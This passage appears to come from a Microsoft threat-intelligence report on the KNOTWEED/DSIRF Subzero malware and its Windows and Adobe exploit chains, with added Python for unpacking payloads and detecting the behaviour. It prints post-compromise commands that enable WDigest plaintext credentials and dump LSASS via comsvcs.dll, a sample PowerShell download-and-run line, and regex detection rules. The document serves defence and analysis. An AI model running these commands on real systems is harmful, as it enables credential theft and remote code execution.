Windows and Adobe 0-day exploits, including one for the recently patched [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), in limited and targeted attacks against European and Central American customers. The PSOA, which MSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.\n\nThis blog details Microsoft\u2019s analysis of the observed KNOTWEED activity and related malware used in targeted attacks against our customers. This information is shared with our customers and industry partners to improve detection of these attacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their systems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have also implemented detections against KNOTWEED\u2019s malware and tools.\n\nPSOAs, which [Microsoft also refers to as cyber mercenaries](<https://blogs.microsoft.com/on-the-issues/2022/07/27/private-sector-cyberweapons-psoas-knotweed/>), sell hacking tools or services through a variety of business models. Two common models for this type of actor are access-as-a-service and hack-for-hire. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the actor, who then runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that KNOTWEED may blend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.\n\n## Who is KNOTWEED?\n\nKNOTWEED is an Austria-based PSOA named DSIRF. 
The [DSIRF website](<https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/>) [web archive link] says they provide services \u201c_to multinational corporations in the technology, retail, energy and financial sectors_\u201d and that they have \u201c_a set of highly sophisticated techniques in gathering and analyzing information_.\u201d They publicly offer several services including \u201c_an enhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities_\u201d and \u201c_highly sophisticated Red Teams to challenge your company's most critical assets_.\u201d\n\nHowever, [multiple](<https://www.intelligenceonline.com/surveillance--interception/2022/04/06/after-finfisher-s-demise-berlin-explores-cyber-tool-options,109766000-art>) [news](<https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html>) [reports](<https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich>) have linked DSIRF to the development and attempted sale of a malware toolset called Subzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in Windows and Adobe Reader, in 2021 and 2022. As part of our investigation into the utility of this malware, Microsoft\u2019s communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity. Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama. 
It\u2019s important to note that the identification of targets in a country doesn\u2019t necessarily mean that a DSIRF customer resides in the same country, as international targeting is common.\n\nMSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF.\n\n## Observed actor activity\n\n### KNOTWEED initial access\n\nMSTIC found KNOTWEED\u2019s Subzero malware deployed in a variety of ways. In the following sections, the different stages of Subzero are referred to by their Microsoft Defender detection names: _Jumplump_ for the persistent loader and _Corelump_ for the main malware.\n\n#### KNOTWEED exploits in 2022\n\nIn May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation exploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF document that was sent to the victim via email. Microsoft was not able to acquire the PDF or Adobe Reader RCE portion of the exploit chain, but the victim\u2019s Adobe Reader version was released in January 2022, meaning that the exploit used was either a 1-day exploit developed between January and May, or a 0-day exploit. Based on KNOTWEED\u2019s extensive use of other 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was analyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047. 
Interestingly, there were indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although we\u2019ve seen no evidence of browser-based attacks.\n\nThe CVE-2022-22047 vulnerability is related to an issue with [activation context](<https://docs.microsoft.com/windows/win32/sbscs/activation-contexts>) caching in the Client Server Run-Time Subsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly manifest, which would create a malicious activation context in the activation context cache, for an arbitrary process. This cached context is used the next time the process is spawned.\n\nCVE-2022-22047 was used in KNOTWEED-related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit chain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute that specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious activation context was used, the malicious DLL was loaded from the given path, and system-level code execution was achieved.\n\nIt's important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the threat model of sandboxes, such as that of Adobe Reader and Chromium, the ability to write out files where the attacker _cannot_ control the path isn\u2019t considered dangerous. 
Hence, these sandboxes aren\u2019t a barrier to the exploitation of CVE-2022-22047.\n\n#### KNOTWEED exploits in 2021\n\nIn 2021, MSRC received a report of two Windows privilege escalation exploits ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>) and [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>)) being used in conjunction with an Adobe Reader exploit ([CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>)), all of which were patched in June 2021. MSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.\n\nWe were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation vulnerability in the Windows Update Medic Service ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)), which allowed an attacker to force the service to load an arbitrary signed DLL. The malicious DLL used in the attacks was signed by \u2018DSIRF GmbH\u2019.\n\nFigure 1: Valid digital signature from DSIRF on Medic Service exploit DLL\n\n#### Malicious Excel documents\n\nIn addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file masquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of benign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.\n\nFigure 2: Two examples of KNOTWEED Excel macro obfuscation\n\nAfter de-obfuscating strings at runtime, the VBA macro uses the _ExecuteExcel4Macro_ function to call native Win32 functions to load shellcode into memory allocated using _VirtualAlloc_. 
Each opcode is individually copied into a newly allocated buffer using _memset_ before _CreateThread_ is called to execute the shellcode.\n\nFigure 3: Copying opcodes\n\nFigure 4: Calling CreateThread on shellcode\n\nThe following section describes the shellcode executed by the macro.\n\n### KNOTWEED malware and tactics, techniques, and procedures (TTPs)\n\n#### Corelump downloader and loader shellcode\n\nThe downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The shellcode's purpose is to retrieve the _Corelump_ second-stage malware from the actor\u2019s command-and-control (C2) server. The downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past the _0xFF 0xD9_ marker that signifies the end of a JPEG file). The JPEG is then written to the user\u2019s _%TEMP%_ directory.\n\nFigure 5: One of the images embedded with the loader shellcode and Corelump\n\nThe downloader shellcode searches for a 16-byte marker immediately following the end of the JPEG. After finding the marker, the downloader shellcode RC4-decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader shellcode RC4-decrypts the _Corelump_ malware using a second RC4 key and manually loads it into memory.\n\n#### Corelump malware\n\n_Corelump_ is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED\u2019s C2 server.\n\nAs part of installation, _Corelump_ makes copies of legitimate Windows DLLs and overwrites sections of them with malicious code. 
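The two-layer unpacking of the downloader and loader shellcode described above can be reproduced for triage of a suspect image recovered from %TEMP%. The Python below is an added example written for this page; it is not Microsoft's code and not the actor's shellcode. The 16-byte marker value, the placement of the second RC4 key (taken here to be the first 16 bytes of the decrypted loader stage) and the sample image are constructed assumptions, because the post does not publish them. What the example does show is the part that matters for triage: walk the JPEG segment structure to find the real EOI instead of trusting the last FF D9 in the file, report any trailing bytes (the signal behind the "abnormally large JPEG" hunt later on this page), and peel both RC4 layers when the marker matches.

```python
import struct

# Constructed assumption: the real 16-byte marker is not published in the post,
# so the demo uses this placeholder (exactly 16 bytes).
DEMO_MARKER = b"KNOTWEED-DEMO-16"
EOI = b"\xff\xd9"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def jpeg_end(data: bytes) -> int:
    """Offset just past the EOI marker, found by walking JPEG segments.

    Walking the structure matters: appended ciphertext can itself contain an
    FF D9 pair, so data.rfind(EOI) may land inside the payload."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (no SOI)")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"corrupt segment at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                      # EOI
            return pos + 2
        if marker == 0xFF:                      # fill byte before a marker
            pos += 1
            continue
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seglen
        if marker == 0xDA:                      # SOS: entropy-coded data until a real marker
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                # FF 00 is a stuffed byte and FF D0..D7 are restart markers, not segment ends
                if data[pos] == 0xFF and nxt not in (0x00, 0xFF) and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def carve(blob: bytes, marker: bytes = DEMO_MARKER) -> dict:
    """Triage a dropped image: report trailing bytes and, if the marker is present,
    peel both RC4 layers. Layout assumed here (constructed; the post only says the
    loader uses a second RC4 key):
        JPEG | marker(16) | key1(16) | RC4(key1, key2(16) | RC4(key2, Corelump))"""
    end = jpeg_end(blob)
    trailer = blob[end:]
    result = {"image_bytes": end, "trailing_bytes": len(trailer),
              "marker_found": False, "payload": None, "looks_like_pe": False}
    if len(trailer) >= 48 and trailer[:16] == marker:
        key1 = trailer[16:32]
        loader_stage = rc4(key1, trailer[32:])
        key2, inner = loader_stage[:16], loader_stage[16:]
        payload = rc4(key2, inner)
        result.update(marker_found=True, payload=payload, looks_like_pe=payload[:2] == b"MZ")
    return result


def build_demo_jpeg() -> bytes:
    """Constructed, structurally valid JPEG skeleton (not a viewable picture): SOI, APP0,
    SOS, a few bytes of scan data containing a stuffed FF 00 and an RST0 marker, EOI."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\xff\x00\x34\xff\xd0\x56"
    return b"\xff\xd8" + app0 + sos + scan + EOI


def pack_stages(corelump: bytes, key1: bytes, key2: bytes, marker: bytes = DEMO_MARKER) -> bytes:
    """Build a sample in the assumed layout so carve() can be exercised offline."""
    loader_stage = key2 + rc4(key2, corelump)
    return build_demo_jpeg() + marker + key1 + rc4(key1, loader_stage)


if __name__ == "__main__":
    sample = pack_stages(b"MZ" + b"\x90" * 40, b"A" * 16, b"B" * 16)
    print(carve(sample))
```

On a real sample the marker and the key placement would have to come from the downloader shellcode itself; the trailing-byte count alone is already a useful triage signal, since a picture should end at its EOI.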
As part of this process, _Corelump_ also modifies the fields in the PE header to accommodate the nefarious changes, such as adding new exported functions, disabling [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), and modifying the image file checksum with a computed value from _CheckSumMappedFile_. These trojanized binaries (_Jumplump_) are dropped to disk in _C:\\Windows\\System32\\spool\\drivers\\color\\_, and COM registry keys are modified for persistence (see the Behaviors section for more information on COM hijacking).\n\n#### Jumplump loader\n\n_Jumplump_ is responsible for loading _Corelump_ into memory from the JPEG file in the _%TEMP%_ directory. If _Corelump_ is not present, _Jumplump_ attempts to download it again from the C2 server. Both _Jumplump_ and the downloader shellcode are heavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp combination, giving a convoluted control flow throughout the program.\n\nFigure 6: Disassembly showing the jmp/instruction obfuscation used in Jumplump\n\n#### Mex and PassLib\n\nKNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by KNOTWEED and bear capabilities that are derived from publicly available sources. 
Mex, for example, is a command-line tool containing several red teaming or security plugins copied from GitHub (listed below):\n\n[Chisel](<https://github.com/jpillora/chisel>)| [mimikatz](<https://github.com/ParrotSec/mimikatz>)| [SharpHound3](<https://github.com/BloodHoundAD/SharpHound3>) \n---|---|--- \n[Curl](<https://github.com/curl/curl>)| [Ping Castle](<https://github.com/vletoux/pingcastle>)| [SharpOxidResolver](<https://github.com/S3cur3Th1sSh1t/SharpOxidResolver>) \n[Grouper2](<https://github.com/l0ss/Grouper2>)| [Rubeus](<https://github.com/GhostPack/Rubeus>)| [SharpPrinter](<https://github.com/rvrsh3ll/SharpPrinter>) \n[Internal Monologue](<https://github.com/eladshamir/Internal-Monologue>)| [SCShell](<https://github.com/Mr-Un1k0d3r/SCShell>)| [SpoolSample](<https://github.com/leechristensen/SpoolSample>) \n[Inveigh](<https://github.com/Kevin-Robertson/Inveigh>)| [Seatbelt](<https://github.com/GhostPack/Seatbelt>)| [StandIn](<https://github.com/FuzzySecurity/StandIn>) \n[Lockless](<https://github.com/GhostPack/Lockless>)| [SharpExec](<https://github.com/anthemtotheego/SharpExec>)| \n \nPassLib is a custom password stealer tool capable of dumping credentials from a variety of sources including web browsers, email clients, LSASS, LSA secrets, and the Windows credential manager.\n\n#### Post-compromise actions\n\nIn victims where KNOTWEED malware had been used, a variety of post-compromise actions were observed:\n\n * Setting of _UseLogonCredential_ to \u201c1\u201d to enable plaintext credentials:\n    * _reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f_\n * Credential dumping via _comsvcs.dll_:\n    * _rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump_\n * Attempt to access emails with dumped credentials from a KNOTWEED IP address\n * Using Curl to download KNOTWEED tooling from public file shares such as _vultrobjects[.]com_\n * Running PowerShell scripts directly from a GitHub 
gist created by an account associated with DSIRF\n\n### KNOTWEED infrastructure connections to DSIRF\n\nPivoting off a known command-and-control domain identified by MSTIC, _acrobatrelay[.]com_, RiskIQ expanded the view of KNOTWEED's attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network fingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under the control of KNOTWEED. This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving malware since at least February of 2020 and continues through the time of this writing.\n\nRiskIQ next utilized passive DNS data to determine which domains those IPs resolved to at the time they were malicious. This process yielded several domains with direct links to DSIRF, including _demo3[.]dsirf[.]eu_ (the company's own website), and several subdomains that appear to have been used for malware development, including _debugmex[.]dsirflabs[.]eu_ (likely a server used for debugging malware with the bespoke utility tool Mex) and _szstaging[.]dsirflabs[.]eu_ (likely a server used to stage Subzero malware).\n\n## Detection and prevention\n\nMicrosoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current detections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional advanced hunting queries are also provided below to help organizations extend their protections and investigations of these attacks.\n\n### Behaviors\n\n_Corelump_ drops the _Jumplump_ loader DLLs to _C:\\Windows\\System32\\spool\\drivers\\color\\_. 
This is a common directory used by malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.\n\n_Jumplump_ uses COM hijacking for persistence, modifying COM registry keys to point to the _Jumplump_ DLL in _C:\\Windows\\System32\\spool\\drivers\\color\\_. Modifications of default system CLSID values should be monitored to detect this technique (e.g., the default value of _HKLM\\SOFTWARE\\Classes\\CLSID\\\\{GUID}\\InProcServer32_). The five CLSIDs used by _Jumplump_ are listed below with their original clean values on Windows 11:\n\n * {ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea} = "_%SystemRoot%\\System32\\ApplicationFrame.dll_"\n * {1f486a52-3cb1-48fd-8f50-b8dc300d9f9d} = "_%SystemRoot%\\system32\\propsys.dll_"\n * {4590f811-1d3a-11d0-891f-00aa004b2e24} = "_%SystemRoot%\\system32\\wbem\\wbemprox.dll_"\n * {4de225bf-cf59-4cfc-85f7-68b90f185355} = "_%SystemRoot%\\system32\\wbem\\wmiprvsd.dll_"\n * {F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} = "_%SystemRoot%\\System32\\Actioncenter.dll_"\n\nMany of the post-compromise actions can be detected based on their command lines. 
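The monitoring points in this section can be turned into a small host-triage script. The following Python is an added example for this page; it is not Microsoft's detection logic and not one of the Sentinel or advanced hunting queries linked later. It compares the five CLSIDs above against the clean values listed, and runs command-line patterns for the post-compromise actions over process-creation events. The registry snapshot and the events are constructed inline and marked as such so the script runs anywhere; on a live host the snapshot would come from `snapshot_from_registry()` (winreg, Windows only) and the events from Sysmon Event ID 1 or Security Event 4688. Two details go slightly beyond what the post lists: the `#24` ordinal form of the comsvcs.dll MiniDump call, and checking the per-user `HKCU\Software\Classes\CLSID` hive first, since it takes precedence over HKLM for COM lookups.

```python
import re
from typing import Dict, List

COLOR_DIR = r"c:\windows\system32\spool\drivers\color"

# Clean InProcServer32 default values on Windows 11 for the five CLSIDs listed in the post.
BASELINE: Dict[str, str] = {
    "{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}": r"%SystemRoot%\System32\ApplicationFrame.dll",
    "{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}": r"%SystemRoot%\system32\propsys.dll",
    "{4590f811-1d3a-11d0-891f-00aa004b2e24}": r"%SystemRoot%\system32\wbem\wbemprox.dll",
    "{4de225bf-cf59-4cfc-85f7-68b90f185355}": r"%SystemRoot%\system32\wbem\wmiprvsd.dll",
    "{f56f6fdd-aa9d-4618-a949-c1b91af43b1a}": r"%SystemRoot%\System32\Actioncenter.dll",
}

# Command-line patterns for the post-compromise actions in the post. "#24" is the ordinal
# alias of comsvcs.dll's MiniDump export, a common way to avoid the literal name.
CMDLINE_RULES = [
    ("wdigest_plaintext", re.compile(
        r"\breg(\.exe)?\s+add\b.*securityproviders\\wdigest\b.*uselogoncredential\b.*/d\s+0*1\b", re.I)),
    ("lsass_minidump_comsvcs", re.compile(
        r"\brundll32(\.exe)?\b.*comsvcs\.dll\s*,\s*#?(24|minidump)\b", re.I)),
    ("curl_download", re.compile(r"(^|\s)curl(\.exe)?\s.*https?://", re.I)),
    ("powershell_remote_script", re.compile(
        r"\bpowershell(\.exe)?\b.*(gist\.github(usercontent)?\.com|downloadstring|downloadfile"
        r"|invoke-webrequest|\biwr\b|\biex\b)", re.I)),
]


def normalize_path(path: str) -> str:
    """Case-fold and expand %SystemRoot% (assumed C:\\Windows here; use os.environ on a live host)."""
    p = path.strip().strip('"').lower()
    if p.startswith("%systemroot%"):
        p = "c:\\windows" + p[len("%systemroot%"):]
    return p


def check_com_keys(snapshot: Dict[str, str]) -> List[dict]:
    """Flag baseline CLSIDs whose InProcServer32 default value no longer matches the clean DLL."""
    snap = {k.lower(): v for k, v in snapshot.items()}
    findings = []
    for clsid, expected in BASELINE.items():
        current = snap.get(clsid)
        if current is None:
            continue                                  # key absent or unreadable: nothing to compare
        cur, exp = normalize_path(current), normalize_path(expected)
        if cur != exp:
            findings.append({"clsid": clsid, "current": current, "expected": expected,
                             "in_color_dir": cur.startswith(COLOR_DIR)})
    return findings


def scan_process_events(events: List[dict]) -> List[dict]:
    """Run every command-line rule over each process-creation event; one hit per matching rule."""
    hits = []
    for ev in events:
        for name, rx in CMDLINE_RULES:
            if rx.search(ev["cmdline"]):
                hits.append({"pid": ev["pid"], "rule": name, "cmdline": ev["cmdline"]})
    return hits


def snapshot_from_registry() -> Dict[str, str]:
    """Windows only: read live values for the baseline CLSIDs. HKCU is read first because
    a per-user override wins over HKLM when COM resolves a CLSID."""
    import winreg
    snap: Dict[str, str] = {}
    roots = ((winreg.HKEY_CURRENT_USER, r"Software\Classes\CLSID"),
             (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Classes\CLSID"))
    for hive, root in roots:
        for clsid in BASELINE:
            try:
                with winreg.OpenKey(hive, root + "\\" + clsid + r"\InProcServer32") as key:
                    snap.setdefault(clsid, winreg.QueryValueEx(key, "")[0])
            except OSError:
                continue
    return snap


# Constructed sample data (not from any real host): one hijacked CLSID and four process events.
SAMPLE_REGISTRY = {
    "{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}": r"%SystemRoot%\System32\ApplicationFrame.dll",
    "{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}": r"C:\Windows\System32\spool\drivers\color\propsys.dll",
    "{4590f811-1d3a-11d0-891f-00aa004b2e24}": r"C:\WINDOWS\system32\wbem\wbemprox.dll",
    "{4de225bf-cf59-4cfc-85f7-68b90f185355}": r"%SystemRoot%\system32\wbem\wmiprvsd.dll",
    "{f56f6fdd-aa9d-4618-a949-c1b91af43b1a}": r"%SystemRoot%\System32\Actioncenter.dll",
}
SAMPLE_EVENTS = [
    {"pid": 4120, "cmdline": r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f"},
    {"pid": 4188, "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Users\Public\lsass.dmp full"},
    {"pid": 4201, "cmdline": r"curl.exe -o C:\Users\Public\m.bin https://files.example.com/m.bin"},
    {"pid": 4230, "cmdline": r"powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/example/raw/x.ps1')"},
    {"pid": 4300, "cmdline": r"svchost.exe -k netsvcs -p -s Schedule"},
]

if __name__ == "__main__":
    print(check_com_keys(SAMPLE_REGISTRY))
    print(scan_process_events(SAMPLE_EVENTS))
```

The CLSID comparison is deliberately a baseline diff rather than a pure "points into the color folder" check: a hijack that redirects to any other attacker-controlled path is caught the same way, and the `in_color_dir` flag just marks the KNOTWEED-specific variant.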
Customers should monitor for possible malicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry keys such as _HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest_, and LSASS credential dumping via minidumps.\n\n## Recommended customer actions\n\nThe techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:\n\n * All customers should prioritize patching of [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>).\n * Confirm that Microsoft Defender Antivirus is updated to security intelligence update **1.371.503.0** or later to detect the related indicators.\n * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.\n * [Change Excel macro security settings](<https://support.microsoft.com/office/change-macro-security-settings-in-excel-a97c09d2-c082-46b8-b19f-e8621e8fe373>) to control which macros run and under what circumstances when you open a workbook. Customers can also [stop malicious XLM or VBA macros](<https://www.microsoft.com/security/blog/2021/03/03/xlm-amsi-new-runtime-defense-against-excel-4-0-macro-malware/>) by ensuring runtime macro scanning by Antimalware Scan Interface ([AMSI](<https://docs.microsoft.com/windows/win32/amsi/antimalware-scan-interface-portal>)) is on. This feature, which is enabled by default, is on if the Group Policy setting for Macro Run Time Scan Scope is set to \u201cEnable for All Files\u201d or \u201cEnable for Low Trust Files\u201d.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. 
_Note:_ Microsoft strongly encourages all customers to download and use passwordless solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n\n## Indicators of compromise (IOCs)\n\nThe following list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems. All sample hashes are available in VirusTotal.\n\nIndicator| Type| Description \n---|---|--- \n78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629| SHA-256| Malicious Excel document and VBA \n0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f| SHA-256| Malicious Excel document and VBA \n441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964| SHA-256| Jumplump malware \ncbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b| SHA-256| Jumplump malware \nfd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc| SHA-256| Jumplump malware \n5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206| SHA-256| Jumplump malware \n7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc| SHA-256| Jumplump malware \n02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d| SHA-256| Jumplump malware \n7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d| SHA-256| Jumplump malware \nafab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec| SHA-256| Jumplump malware \n894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53| SHA-256| Jumplump malware \n4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431| SHA-256| Jumplump malware 
\nc96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d| SHA-256| Corelump malware \nfa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca| SHA-256| Mex tool \ne64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6| SHA-256| PassLib tool \nacrobatrelay[.]com| Domain| C2 \nfinconsult[.]cc| Domain| C2 \nrealmetaldns[.]com| Domain| C2 \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Detections\n\n### Microsoft Defender Antivirus\n\nMicrosoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build **1.371.503.0** as the following family names:\n\n * _Backdoor:O97M/JumplumpDropper_\n * _Trojan:Win32/Jumplump_\n * _Trojan:Win32/Corelump_\n * _HackTool:Win32/Mexlib_\n * _Trojan:Win32/Medcerc_\n * _Behavior:Win32/SuspModuleLoad_\n\n### Microsoft Defender for Endpoint\n\nMicrosoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack. 
These alerts are not necessarily an indication of KNOTWEED compromise:\n\n * _COM Hijacking_ - Detects multiple behaviors, including _Jumplump_ malware persistence techniques.\n * _Possible privilege escalation using CTF module_ - Detects a possible privilege escalation behavior associated with CVE-2022-22047; also detects an attempt to perform local privilege escalation by launching an elevated process and loading an untrusted module to perform malicious activities.\n * _KNOTWEED actor activity detected_ - Detects KNOTWEED actor activities.\n * _WDigest configuration change_ - Detects potential retrieval of clear text passwords enabled by changes to the _UseLogonCredential_ registry value.\n * _Sensitive credential memory read_ - Detects LSASS credential dumping via minidumps.\n * _Suspicious Curl behavior_ - Detects the use of Curl to download KNOTWEED tooling from public file shares.\n * _Suspicious screen capture activity_ - Detects _Corelump_ behavior of capturing screenshots of the compromised system.\n\n## Hunting queries\n\n### Microsoft Sentinel\n\nThe following resources are available to Microsoft Sentinel customers to identify the activity outlined in the blog post.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies occurrences of Microsoft Defender Antivirus detections listed in this blog post:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDAVDetection.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDFileHashesJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel data 
sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDC2DomainsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/COMRegistryKeyModifiedtoPointtoFileinColorDrivers.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\_ folder:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/DeviceFileEvents/PEfiledroppedinColorDriversFolder.yaml>\n\n**Abnormally large JPEG downloaded from new source**\n\nThis query looks for downloads of JPEG files from remote sources where the file size is abnormally large and the source is not a common one:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/AbnormallyLargeJPEGFiledDownloadedfromNewSource.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/DownloadofNewFileUsingCurl.yaml>\n\n**Suspected credential dumping**\n\nThis query looks for attackers using comsvcs.dll to dump credentials from LSASS 